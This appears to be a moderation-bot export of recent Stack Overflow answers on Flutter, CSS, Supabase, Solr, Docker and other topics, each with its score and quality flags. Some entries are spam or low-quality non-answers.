79500503

Date: 2025-03-11 11:07:19
Score: 2.5
Natty:
Report link

Try to rename the project name and update the name in the package.json file.

package.json file

{ "name": "update name of project here", }

now start the server.

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Mukesh Kumar

79500497

Date: 2025-03-11 11:06:19
Score: 2
Natty:
Report link

If you are building an app in Flutter and any of these solutions doesn't work then run -
- flutter clean
- flutter pub get

or trying to clean gradle -
- cd android
- ./gradlew clean

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Tushar

79500494

Date: 2025-03-11 11:05:19
Score: 1.5
Natty:
Report link

Use background-attachment: scroll for Safari: As you are already applying a media query to change the background-attachment for mobile devices (background-attachment: scroll), it seems that this is not being applied to all mobile browsers effectively.

Use transform for smoother parallax effect: Instead of relying on background-attachment: fixed, you can achieve a parallax effect using transform and translate3d, which is more stable across browsers.

Reasons:
  • No code block (0.5):
  • Low reputation (1):
Posted by: user23665954

79500490

Date: 2025-03-11 11:04:18
Score: 3
Natty:
Report link

The issue was the size of the SVG I tried to include, it was too big, I had to resize from 471 to 50.

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Self-answer (0.5):
  • Single line (0.5):
  • Low reputation (0.5):
Posted by: Oupat

79500489

Date: 2025-03-11 11:04:18
Score: 1
Natty:
Report link

wampserver use different php.ini for cli and web

for cli , if you need to edit the php.ini under bin/php/phpX.XXXX/php.ini

so if the program is for cli, simply uncomment the intl.dll

for web , you can edit under apache folder

Reasons:
  • Low length (0.5):
  • No code block (0.5):
Posted by: chings228

79500488

Date: 2025-03-11 11:04:18
Score: 2.5
Natty:
Report link

Well I finally found the answer myself. I had to open a code window and click on the Tools menu. This revealed a list containing References... Macros... Options... and (wait for it) Oldname Properties... and when I clicked on this last one it opened a rather boring page with a number of text boxes, the first one being labelled Project Name. This contained the old name, so I entered the new name.

Seemed a rather silly place to hide this information, but then it is a Microsoft Application so one shouldn't be too surprised.

By the way, when I clicked on the link in the email I received from Stack Overflow, it led me to a login page where none of my saved passwords worked. Eventually I tried going to https://stackoverflow.com and found I was automatically logged in straight away! I'll never understand web security...

Reasons:
  • Blacklisted phrase (1): stackoverflow
  • Long answer (-0.5):
  • No code block (0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: Captain Nemo

79500486

Date: 2025-03-11 11:03:18
Score: 2.5
Natty:
Report link

Solved with @Zacharias answer.
For me the problem was at webserver level. I had the Referrer-Policy header set to strict-origin. By definition that header value makes the webserver to use only the origin and only if HTTPS. Changing that header to 'same-origin' solved the problem in dev environment (because i was on HTTP)

Reasons:
  • No code block (0.5):
  • User mentioned (1): @answer
  • Low reputation (1):
Posted by: Raffaele Bertani

79500478

Date: 2025-03-11 10:59:17
Score: 1
Natty:
Report link

Once your model loads once in Panda3D it gets stored in the model cache; if the textures failed to load, there may now be a version of the model cached without loaded textures. Open the egg file in a text editor and save it again; that will update the modification timestamp on the file, and Panda will re-load it from disk. Then you can check if the same errors are still displayed.

Reasons:
  • No code block (0.5):
  • Single line (0.5):
Posted by: rdb

79500474

Date: 2025-03-11 10:57:17
Score: 0.5
Natty:
Report link

Add to .vscode/settings.json:

"python.testing.unittestArgs": [],
"python.testing.unittestEnabled": true,

In root of your project create a .env file:

MANAGE_PY_PATH=manage.py

if you don't want create .env file in root, add to .vscode/settings.json:

"python.envFile": "${workspaceFolder}/-your-folder-/.env"
Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: sav21age

79500472

Date: 2025-03-11 10:56:17
Score: 0.5
Natty:
Report link

I encountered a similar problem recently. In a solution file, I have my library project and a web API project. In both projects, I installed a nuget package of a different project I own. I had a problem of locally referencing that project in the web API.

This was because I had referenced the nuget package in the library, I couldn't use a local reference in the web API. This is not mentioned in any of the error messages. I knew it was a problem only on the web API because the assembly path updates when I add the reference to other projects.

So it should also help if you look into your references if any are causing conflicts with your library DLL. It might be that other referenced libraries/projects you have in the new web app is using a different version of the library DLL.

Reasons:
  • Long answer (-0.5):
  • No code block (0.5):
  • Low reputation (0.5):
Posted by: Patrick Xavier

79500471

Date: 2025-03-11 10:55:16
Score: 0.5
Natty:
Report link

Correct way to mock sftp-list operation where attributes can be available inside foreach loop:

\<flow doc:name="Flow" \>

\<file:list doc:name="List" config-ref="File_Config" directoryPath="/tmp/"/\>

\</flow\>

\<munit-tools:mock-when processor="file:list"\>

\<munit-tools:with-attributes\>

   \<munit-tools:with-attribute attributeName="doc:name" whereValue="List"/\>

\</munit-tools:with-attributes\>

\<munit-tools:then-return\>

   \<munit-tools:payload value="#\[\[MunitTools::createMessage( &quot;ITEM-1&quot;,  &quot;text/plain&quot;, { property : 'ATTRIBUTE-1'}, null) , MunitTools::createMessage( &quot;ITEM-2&quot;,  &quot;text/plain&quot;, { property : 'ATTRIBUTE-2'}, null)\]\]" /\>

 \</munit-tools:then-return\>

 \</munit-tools:mock-when\>
Reasons:
  • Long answer (-0.5):
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: PSAFOL

79500469

Date: 2025-03-11 10:54:16
Score: 1.5
Natty:
Report link

You can doit by using the Null-coalescing assignment operator ??=

$ExistingVar = 'set by script'

$MyPath ??= $env:PWD
$MyVar ??= 'default value'
$ExistingVar ??= 'Cannot set this string to not null vars'

echo $MyPath
echo $MyVar
echo $ExistingVar
Reasons:
  • Probably link only (1):
  • Low length (0.5):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: LittleEaster

79500464

Date: 2025-03-11 10:52:15
Score: 5.5
Natty: 4
Report link

guethis is guest yser user guestst

Reasons:
  • Contains signature (1):
  • Low length (2):
  • No code block (0.5):
  • Unregistered user (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: guest

79500451

Date: 2025-03-11 10:47:14
Score: 3.5
Natty:
Report link

It is very true. I had to downgrade to visual studio 2015 and work with 4.5.2 framework. Viewer added easily. I followed advise on stackoverflow to copy .vb, designer and resx into my current project (2015), added the items, excluded from project and added only the .vb form file. All controls appeared correctly. It is advisable to approach that if a control is not dependent on a reference library.

Reasons:
  • Blacklisted phrase (1): stackoverflow
  • No code block (0.5):
  • Self-answer (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Dan K

79500447

Date: 2025-03-11 10:46:14
Score: 2
Natty:
Report link

If you're using the http-server package from npmjs, there is a way to have a catch-all redirect to itself again for SPAs like Angular: https://www.npmjs.com/package/http-server#catch-all-redirect

Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: papagei9

79500429

Date: 2025-03-11 10:39:12
Score: 1
Natty:
Report link

You can also simply do:

tree.tk.call('.'+tree_name, 'tag', 'add', tag_name, f'{{{iid}}}')

Note that to do this you also have to add the option name=tree_name when defining the Treeview object.

Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: GiAnMMV

79500427

Date: 2025-03-11 10:38:12
Score: 1
Natty:
Report link

You're on the right track with setting up a one-to-many relationship in PostgreSQL using Spring Data JDBC. The issue you're facing is common when using LEFT JOIN, It duplicates the parent row for each child, which isn't ideal since you're using a Set<ChildEntity>.
Since Spring Data JDBC automatically maps child entities when fetching a parent, you don’t need to manually join tables. Instead of using LEFT JOIN, just fetch the parent entity directly or fetch separately the child records separately.
SELECT * FROM parent_table WHERE position_id = ?; or SELECT * FROM child_table WHERE parent_table_id = ?;

Reasons:
  • Long answer (-0.5):
  • Has code block (-0.5):
  • Contains question mark (0.5):
  • Unregistered user (0.5):
  • Low reputation (1):
Posted by: Rahul

79500421

Date: 2025-03-11 10:36:11
Score: 0.5
Natty:
Report link

why wouldn't contains() or endswith() be indexed as well?

NOTE: contains() and endswith() are NOT indexed because they require scanning every row, making them slow. SharePoint does not support reverse or full-text indexing in Graph API, which would be needed for contains() and endswith(),

Recommended way is to use startswith() for fast Graph API queries For more details Refer this QnA.

startswith() is indexed because SharePoint stores data in sorted and indexed structure, allowing quick lookups without scanning the entire dataset, which makes more efficient compared to contains() and endswith() .

Generated the access token and used the same $filter query with startswith():

GET https://graph.microsoft.com/v1.0/sites/<site-id>/lists/<list-id>/items?$filter=startswith(fields/FileLeafRef, 'query')

enter image description here

Reference:

Microsoft QnA Blog on startswith

Reasons:
  • Long answer (-0.5):
  • Has code block (-0.5):
  • Contains question mark (0.5):
  • Starts with a question (0.5): why wouldn't
  • Low reputation (0.5):
Posted by: Pratik Jadhav

79500420

Date: 2025-03-11 10:36:11
Score: 0.5
Natty:
Report link

After below changes, I am able to access individual API and also via ocelot gateway using docker.

- Removed ports definition from docker-compose.yml
- In ocleot.json included service name as host and port as 8080
- Exposed only 8080 as port from API's docker file

Final ocelot.json

{
"Routes": [
{
"DownstreamPathTemplate": "/api/products",
"DownstreamScheme": "http",
"DownstreamHostAndPorts": [
{
"Host": "productservice",
"Port": 8080
}
],
"UpstreamPathTemplate": "/products",
"UpstreamHttpMethod": [ "Get" ]
},
]
}

Reasons:
  • Long answer (-0.5):
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: chint

79500416

Date: 2025-03-11 10:35:11
Score: 3.5
Natty:
Report link

Please check the documentation
https://git-extensions-documentation.readthedocs.io/en/release-5.1/remote_feature.html#pull-changes

pull options

Reasons:
  • Probably link only (1):
  • Low length (2):
  • No code block (0.5):
Posted by: RussKie

79500405

Date: 2025-03-11 10:30:10
Score: 1.5
Natty:
Report link

How can I change the CSV output such a way that it removes the trailing zeros and does not use exponential notation (without explicitly using Decimal(18,2) data type)?

Follow the below steps to get the expected output:

Step1: Please try using the following expression to achieve the expected results. replace(toString(toDecimal(Data)),'.00','') enter image description here

Step2: I have used the same sample data that you provided. enter image description here

Step3: Use the following expression in the derived column as required. replace(toString(toDecimal(Data)),'.00','') enter image description here

Step4: Output is as expected as per your requirement. enter image description here

Reasons:
  • Blacklisted phrase (0.5): How can I
  • Long answer (-0.5):
  • Has code block (-0.5):
  • Contains question mark (0.5):
  • Starts with a question (0.5): How can I
  • Low reputation (1):
Posted by: Jagadish S

79500400

Date: 2025-03-11 10:29:10
Score: 3
Natty:
Report link

The colored "odoo" logo is in ~/odoo/addons/web/static/img/logo.png if that is what you where looking for.

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: daWieser

79500393

Date: 2025-03-11 10:26:09
Score: 0.5
Natty:
Report link

From shelve documentation, i can see use Shelf.close() if you want to close a shelf; use flag='r' ensures read-only mode and flag='c' allows creation if it doesn't exist. Other flag modes are w open an existing shelf; n always create a new, empty shelf, open for reading and writing.

https://docs.python.org/3/library/shelve.html

Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: Coco Q.

79500386

Date: 2025-03-11 10:24:09
Score: 1.5
Natty:
Report link

What worked for me with physical device

Just Invalidate caches in android studio

File >> Invalidate Chaces

Reasons:
  • Whitelisted phrase (-1): worked for me
  • Low length (1):
  • No code block (0.5):
  • Starts with a question (0.5): What
  • Low reputation (0.5):
Posted by: Yash

79500381

Date: 2025-03-11 10:23:08
Score: 0.5
Natty:
Report link

In my case the issue was a wrong build command for meson. I.e:

meson setup build --reconfigure -Db_coverage=true -Dc_args=-Og,-w

Is wrong, and should instead be:

meson setup build --reconfigure -Db_coverage=true -Dc_args=-Og

Adding an extra -w causes meson to pass that -w to a default C compiler as a test, which causes the compiler to return an exception. Meson then decides that the compiler doesn't work - and announces that the compiler for "c" is not specified for the host machine.

Reasons:
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (0.5):
Posted by: tornikeo

79500371

Date: 2025-03-11 10:19:08
Score: 3.5
Natty:
Report link

My recommend is Mongoose to management mongodb in nest.js project.

Reasons:
  • Low length (1.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: stack ninja

79500364

Date: 2025-03-11 10:16:07
Score: 1
Natty:
Report link

the watermark logo is being set to a fixed size (100px 100px) using background-size, which can cause it to appear too large on smaller screens, especially on mobile devices. To make the watermark more responsive and avoid it being too big on smaller screens, you can use media queries and relative sizing.

Reasons:
  • Whitelisted phrase (-1.5): you can use
  • Low length (0.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: user23665954

79500357

Date: 2025-03-11 10:14:06
Score: 1
Natty:
Report link

Every day, I look forward to my quick mental workout on Wordle Today (https://wordletoday.cc/). It’s the perfect way to start my morning—simple, fun, and just the right amount of challenge.

Today’s puzzle had me stumped at first, but after a few strategic guesses ("CRANE," "SLICE," "THIEF"), I finally cracked it with "OLIVE"! That moment when all the tiles turn green is so satisfying.

If you haven’t tried Wordle Today yet, I highly recommend it. It’s a great way to sharpen your mind and have a little fun. Plus, it’s free and easy to play!

What was your Wordle Today experience? Share your results below! 🎉Every day, I look forward to my quick mental workout on Wordle Today (https://wordletoday.cc/). It’s the perfect way to start my morning—simple, fun, and just the right amount of challenge.

Today’s puzzle had me stumped at first, but after a few strategic guesses ("CRANE," "SLICE," "THIEF"), I finally cracked it with "OLIVE"! That moment when all the tiles turn green is so satisfying.

If you haven’t tried Wordle Today yet, I highly recommend it. It’s a great way to sharpen your mind and have a little fun. Plus, it’s free and easy to play!

What was your Wordle Today experience? Share your results below! 🎉

Reasons:
  • Long answer (-1):
  • No code block (0.5):
  • Contains question mark (0.5):
  • Low reputation (1):
Posted by: Emily zhou

79500356

Date: 2025-03-11 10:14:06
Score: 2
Natty:
Report link

Experiencing the same issue with .net 9 :-(

process seems hard to solve, it needs a notification system

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Low reputation (0.5):
Posted by: Refre

79500334

Date: 2025-03-11 10:09:05
Score: 3
Natty:
Report link

Tailwind CSS new version is currently not working. Add the different version of Tailwind. It will work

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Muhammad Ahmed

79500331

Date: 2025-03-11 10:09:05
Score: 3
Natty:
Report link

I tried doing this, but every time I force quit the app and reopen it, the authentication does not persist

class SupabaseService {
  Future initialize() async {
    await Supabase.initialize(
      url: supabaseUrl,
      anonKey: supabaseKey,
    );
  }
}

// register the service
await locator<SupabaseService>().initialize(); 

// .. some code

if (!locator.isRegistered<SupabaseClient>()) {
    locator.registerLazySingleton<SupabaseClient>(
      () => Supabase.instance.client,
    );
}

I had managed to make it persist by using local storage and saving the sessionString and recovering it. But now that I have upgraded my flutter and supabase version, the persistSessionString no longer exists

String? sessionString =
      locator<SupabaseClient>().auth.currentSession?.persistSessionString;
// Add to local storage

// Get session string from local storage and recover session
await locator<SupabaseClient>().auth.recoverSession(sessionString);

Anyone got any ideas?

Reasons:
  • Blacklisted phrase (1): any ideas
  • Long answer (-0.5):
  • Has code block (-0.5):
  • Ends in question mark (2):
  • Low reputation (1):
Posted by: Viv Shen

79500317

Date: 2025-03-11 10:05:04
Score: 2.5
Natty:
Report link

You can try to use:

'php_class_name' => self::class

Using this undocumented vc_map attribute allowed me to use completely different classname inside custom namespace.
source: https://stackoverflow.com/a/52983111/16246216

Reasons:
  • Blacklisted phrase (1): stackoverflow
  • Low length (1):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: Dalias

79500309

Date: 2025-03-11 10:03:04
Score: 0.5
Natty:
Report link

If the labels are not showing up then it means maybe fluent bit’s kubernetes filter is not configured correctly. For this you need to manually enrich the events using a custom Lua filter if the default kubernetes metadata collection isn’t sufficient.

Regarding your query, whether it requires direct calls to the Kubernetes API server via Lua scripts. Yes, Lua plugin would require direct API calls to the k8s API server to fetch Job labels. But the Fluent Bit Lua filter plugin has some limitations, like the Lua plugin does not include the necessary HTTP modules to fetch job metadata from the k8s API. To resolve this you need to enrich the data through an external processor. Refer to this How to configure Fluent Bit to collect logs for your K8s cluster blog by Giulia Di Pietro, which will be helpful to resolve the issue.

Note: If you intend to use Lua to interact with kubernetes API directly you will need to implement HTTP requests within Lua however this may require additional modules that aren't included by default fluent bit’s Lua plugin.

Reasons:
  • Long answer (-0.5):
  • No code block (0.5):
  • Low reputation (0.5):
Posted by: Imran Premnawaz

79500306

Date: 2025-03-11 10:02:04
Score: 1
Natty:
Report link

The formula should be dynamic based on your input value.

Change your formula to

formula = (x * 0.5/n) ** 2 + (y * 1.0/n) ** 2 - 1

This works fine

Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: Coco Q.

79500303

Date: 2025-03-11 10:02:04
Score: 1.5
Natty:
Report link

If you used pyproject.toml file

You may prefer list those filters in pyproject.toml file :

[tool.pytest.ini_options]
filterwarnings = [
    "ignore::DeprecationWarning"
]
Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: fferses

79500302

Date: 2025-03-11 10:01:02
Score: 7.5 🚩
Natty:
Report link

did u got an solution for this

Reasons:
  • RegEx Blacklisted phrase (3): did u got an solution
  • Low length (2):
  • No code block (0.5):
  • Single line (0.5):
  • Starts with a question (0.5): did
  • Low reputation (1):
Posted by: user2346947

79500301

Date: 2025-03-11 10:01:02
Score: 1.5
Natty:
Report link

After researching and testing more, I managed to solve this problem by acquiring Power Automate Premium license from my company and after that removing and importing the package again. This way all flows were turned on automatically after importing was done.

To my understanding majority of the flows required Premium license because they used Dataverse as the trigger.

Reasons:
  • No code block (0.5):
  • Self-answer (0.5):
  • Low reputation (0.5):
Posted by: BladeZ

79500298

Date: 2025-03-11 10:00:02
Score: 2
Natty:
Report link

The deepcopy function from Python’s copy module does not correctly copy Gym environments because Gym environments often contain non-serializable objects such as file handles, sockets, or Cython objects that deepcopy cannot handle properly. Additionally, many Gym environments maintain internal states that reference low-level C++ objects or use external dependencies that do not support deep copying............ Read More

Reasons:
  • Has code block (-0.5):
  • Unregistered user (0.5):
  • Single line (0.5):
  • Filler text (0.5): ............
  • Low reputation (1):
Posted by: user29963728

79500284

Date: 2025-03-11 09:55:00
Score: 1.5
Natty:
Report link

This helps at jjwt 0.12.5:

public Claims parseToken(String token) {
    return Jwts.parser().verifyWith(KEY).build().parseSignedClaims(token).getPayload();
}
Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: DJ Chan

79500281

Date: 2025-03-11 09:55:00
Score: 0.5
Natty:
Report link

Late answer, but yes, the whole system is not consistent all the time, even though the commit commands probably are sent in parallel to all resources, some of them might take a bit longer to finalize their work and locks might not be freed at the exact same time

To commit a message on a queue by the queue resource manager might go faster than commiting a bunch of SQL commands for a database resource manager, leading up to that a "listener" gets a message and reads "old" data from the database (in the next transaction)

I know that this particular issue have been solved by some in the way that they add a relative time duration to not make the message is available immediately to the "listener" (a feature most queue managers support)

Reasons:
  • Long answer (-0.5):
  • No code block (0.5):
  • Low reputation (0.5):
Posted by: Kristo

79500279

Date: 2025-03-11 09:54:00
Score: 1
Natty:
Report link

I do have implemented full similar system.

Below is link to full guidance

https://blog.outsourcingnepal.com/2025/02/streamlining-web-application-deployment-with-gitlab-runner-and-iis/

Reasons:
  • Probably link only (1):
  • Low length (1.5):
  • No code block (0.5):
  • High reputation (-2):
Posted by: KoolKabin

79500276

Date: 2025-03-11 09:54:00
Score: 1
Natty:
Report link

After removing docker/network/files/local-kv.db and restarting docker, the docker recreate the right pre-defined networks.

The root cause of this seems to be a customized filesystem mount order problem, the storage of docker is configured to use a plugable m2 disk.

Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (0.5):
Posted by: Xiaofeng

79500272

Date: 2025-03-11 09:53:59
Score: 13 🚩
Natty: 5.5
Report link

Did you find any solution to this problem? Now I Have the same issue.

When I change Any CPU to ARM64 is does not give error but is it correct way.And I make all changes in XCode Also I remove all pair files and re-pair my windows to mac.

Reasons:
  • Blacklisted phrase (1.5): any solution
  • Blacklisted phrase (1): I Have the same issue
  • RegEx Blacklisted phrase (3): Did you find any solution to this problem
  • RegEx Blacklisted phrase (2): any solution to this problem?
  • Low length (0.5):
  • No code block (0.5):
  • Me too answer (2.5): I Have the same issue
  • Contains question mark (0.5):
  • Starts with a question (0.5): Did you find any solution to this
  • Low reputation (1):
Posted by: Ender Fatih Tasar

79500266

Date: 2025-03-11 09:51:56
Score: 8 🚩
Natty: 4
Report link

I’m experiencing the same issue! It seems like SKPaymentQueue.defaultQueue.storefront.countryCode is cached. Even after changing the App Store country by switching Apple IDs, it still returns the wrong country code. Have you managed to solve this issue?

Reasons:
  • Blacklisted phrase (3): Have you managed
  • RegEx Blacklisted phrase (1.5): solve this issue?
  • Low length (0.5):
  • Has code block (-0.5):
  • Ends in question mark (2):
  • Single line (0.5):
  • Low reputation (1):
Posted by: XKCheng

79500262

Date: 2025-03-11 09:49:55
Score: 3
Natty:
Report link

I was using the wrong address, it was localhost:8001/ customer /1

instead of localhost:8001/ customers /1

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: Luz Serrano Díaz

79500257

Date: 2025-03-11 09:47:55
Score: 10.5
Natty: 8
Report link

I started solving the same problem yesterday. Did you manage to solve it somehow?

Reasons:
  • RegEx Blacklisted phrase (3): Did you manage to solve it
  • RegEx Blacklisted phrase (1.5): solve it somehow?
  • Low length (1.5):
  • No code block (0.5):
  • Ends in question mark (2):
  • Unregistered user (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Chymster

79500253

Date: 2025-03-11 09:46:54
Score: 0.5
Natty:
Report link

So I found a solution to this problem. It might not be pretty but it works.

What I did is, I created a class named "JWTAuth" which uses the AuthBase class. When I call the class I pass the token. This way the auth parameter of pysolr will receive a object and not a string, thus it is happy.

class JWTAuth(AuthBase):
    def __init__(self, jwt_token):
        self.jwt_token = jwt_token

    def __call__(self, r):
        r.headers['Authorization'] = f'Bearer {self.jwt_token}'
        return r

async def search(
    skip: int = 0,
    limit: int = 100,
    params: SearchQueryParams = Depends(),
) -> Any:
    """
    Search query.
    """

    zookeeper = pysolr.ZooKeeper("search-zoo1,search-zoo2,search-zoo3")

    solr = pysolr.SolrCloud(zookeeper, "tag", auth=JWTAuth(add-token-here))

    res = solr.search(q=params.query, start=skip, rows=limit)

    return SearchResults(data=res, count=res.hits)
Reasons:
  • Long answer (-0.5):
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: anvbis

79500252

Date: 2025-03-11 09:46:54
Score: 0.5
Natty:
Report link

This is the code that finally works.

thetashould be the angle between optic axis and the point on the image, so tan(theta) will be r/f assuming ris the distance of the 2D point (on the image) from the center of the image. Looks like I got the core concept wrong in the original post

img = cv2.imread(<impath>)[:,:,::-1]
H, W, _ = img.shape
cX, cY = W//2, H//2 #7, 5 
f = min(cX, cY)
mapX = np.zeros((H, W))
mapY = np.zeros((H, W))
for x in range(W):
    for y in range(H):
        dx, dy = (x - cX), (y - cY)
        r = np.sqrt(dx**2 + dy**2)
        phi = np.arctan2(dy, dx)
        theta = np.arctan(r/f)
        rnew = f*theta
        xnew = cX + rnew*np.cos(phi)
        ynew = cY + rnew*np.sin(phi)
        mapX[H - 1 - int(ynew), int(xnew)] = H - 1 - y
        mapY[H - 1 - int(ynew), int(xnew)] = x
distorted = cv2.remap(np.array(img, "uint8"), np.array(mapY, "float32"), np.array(mapX, "float32"), interpolation=cv2.INTER_LINEAR, borderMode=cv2.BORDER_CONSTANT)
Reasons:
  • Long answer (-0.5):
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: JVG

79500237

Date: 2025-03-11 09:41:53
Score: 0.5
Natty:
Report link

Try this

npm install @rollup/rollup-win32-x64-msvc --save-dev

Reasons:
  • Whitelisted phrase (-1): Try this
  • Low length (1.5):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: n___dv

79500225

Date: 2025-03-11 09:39:52
Score: 0.5
Natty:
Report link

I made my day by myself :). Thanks All :)

npm i -D puppeteer
npm i -g bun #or npm i -g tsx 
puppeteer browsers install chrome
touch open-inspector.ts # should contain the code listed below
chmod +x open-inspector.ts
./open-inspector.ts

Running with tsx/bunjs

file ./open-inspector.ts

#!/usr/bin/env bun
# or #!/usr/bin/env tsx
import puppeteer from 'puppeteer';

const browser = await puppeteer.launch({ headless: false, defaultViewport: null });
const page = (await browser.pages()).at(0);
await page.goto('chrome://inspect');
await page.waitForSelector('#node-frontend');
await page.click('#node-frontend');
await page.close();

no more questions - runs like a charm

Reasons:
  • Blacklisted phrase (0.5): Thanks
  • Long answer (-0.5):
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (0.5):
Posted by: Michał Grzegorzewski

79500224

Date: 2025-03-11 09:38:52
Score: 1
Natty:
Report link

The best way to match GitHub's exact styling is to first render the Markdown as HTML in a browser (eg using markdown-viewer extension as mentioned above) and then print it to PDF. This ensures the closest possible visual match. The downside, though, is that many print-to-PDF methods embed text as images, making it unselectable.

I was actually browsing SO for ideas to improve my Markdown-to-PDF extension, and your question stood out. Right now, I’m working on implementing code block rendering with proper syntax highlighting, and I hope to solve this without relying on image-based exports. I’ll also definitely add a theme chooser to make styling more flexible.

Reasons:
  • Long answer (-0.5):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Alex Ershov

79500218

Date: 2025-03-11 09:37:52
Score: 1.5
Natty:
Report link

A bug was opened a while back addressing this issue. As you can see in the interactions, I ended up using another tool for the test I needed writing, but it seems that what caused the problem with Pact was having set file_write_mode to merge. Seems that for some reason that couldn't be replicated, Pact retained this setting option even after l had removed it from its initialization.

Reasons:
  • Blacklisted phrase (0.5): I need
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Single line (0.5):
  • Low reputation (0.5):
Posted by: apires

79500213

Date: 2025-03-11 09:35:51
Score: 1.5
Natty:
Report link

Put this plugin as well in your pom.xml

   <build>
        <plugins>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-plugin-plugin</artifactId>
                <version>3.8.1</version>
            </plugin>
               <!-- Other Plugins -->
        </plugins>
   </build>
Reasons:
  • Blacklisted phrase (1): this plugin
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: Kramika

79500195

Date: 2025-03-11 09:30:50
Score: 3
Natty:
Report link

The solution for first problem was to give the parameters a value when calling the report and not to rely on the defined default value.

For the second problem the solution was to REPLACE their position in the SQL query:

execute MyServer.MyDB.MyProc @Param2, @Param1, @Param3.

Then @Param1 and @Param2 got the right values.

Reasons:
  • No code block (0.5):
  • User mentioned (1): @Param2
  • User mentioned (0): @Param1
  • User mentioned (0): @Param3
  • User mentioned (0): @Param1
  • User mentioned (0): @Param2
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: Shabtay Fischer

79500190

Date: 2025-03-11 09:28:49
Score: 1
Natty:
Report link

Save image in desire path:

docker save -o /home/myimage.tar myimage-app  

Transfer it using SCP:

 scp /home/myimage.tar root@SERVER_IP:/home/
Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: vahid sabet

79500185

Date: 2025-03-11 09:27:48
Score: 4.5
Natty: 3.5
Report link

Explain the process clearly, i also trying to do the same thing

Reasons:
  • Blacklisted phrase (1): trying to do the same
  • Low length (1.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: dharineeshj

79500177

Date: 2025-03-11 09:25:48
Score: 1.5
Natty:
Report link

We’ve built a Docusign VS Code Extension - an AI-powered assistant that helps with issues like this by guiding you through token generation, consent setup, and API orchestration - making the integration process easier.

We’re currently running a closed beta to gather feedback and improve the experience. If you're interested, you can sign up here.

Reasons:
  • No code block (0.5):
  • Low reputation (1):
Posted by: Aman Dhembla

79500176

Date: 2025-03-11 09:23:47
Score: 3
Natty:
Report link

For me updating to the most recent version of Python Debugger (ms-python.debupy) extension (release 2025.4.1) solved the issue!

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Lukas Heller

79500175

Date: 2025-03-11 09:23:47
Score: 1
Natty:
Report link

If your DMARC, SPF, or DKIM authentication is failing with a third-party mail service, check the following:

  1. SPF: Ensure your SPF record includes the third-party service's mail servers. Only one SPF record should be present in DNS.

  2. DKIM: Verify that DKIM signing is enabled in your third-party provider settings and that the correct DKIM key is published in DNS.

  3. DMARC: Confirm that your DMARC record is correctly set up and not enforcing a strict policy that could block unauthenticated emails.

  4. Domain Alignment: Ensure the "From" domain matches the SPF or DKIM domain to pass DMARC alignment.

  5. Email Headers: Check the email headers for SPF, DKIM, and DMARC results to identify where authentication is failing.

  6. Third-Party Service Settings: Some providers require additional configuration—check their documentation for DMARC compliance.

Reasons:
  • Long answer (-0.5):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Shanky Gupta

79500174

Date: 2025-03-11 09:23:47
Score: 4
Natty:
Report link

[FrameworkServlet.java:534] : Context initialization failed com.google.inject.internal.util.$ComputationException: java.lang.ArrayIndexOutOfBoundsException: 14659

we are facing same issue while starting up the application

and we are using java 11 to building the warfile and samw warfile
we deployed in dev2 and UAT but same branch 7.8.8 branch deployed in Dev its working fine with 7.8.8 and 7.8.7 not working getting same issue

Reasons:
  • No code block (0.5):
  • Me too answer (2.5): facing same issue
  • Me too answer (0): getting same issue
  • Low reputation (1):
Posted by: anitha

79500170

Date: 2025-03-11 09:22:47
Score: 2.5
Natty:
Report link

There are no limits or quotas, but it would be practical to consider battery optimisation and system health

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (0.5):
Posted by: Mohamed Rimshad

79500169

Date: 2025-03-11 09:22:46
Score: 5
Natty: 5
Report link

can i ask what the results of this project I have nearly project of youres

Reasons:
  • Blacklisted phrase (1): can i ask
  • Low length (1.5):
  • No code block (0.5):
  • Single line (0.5):
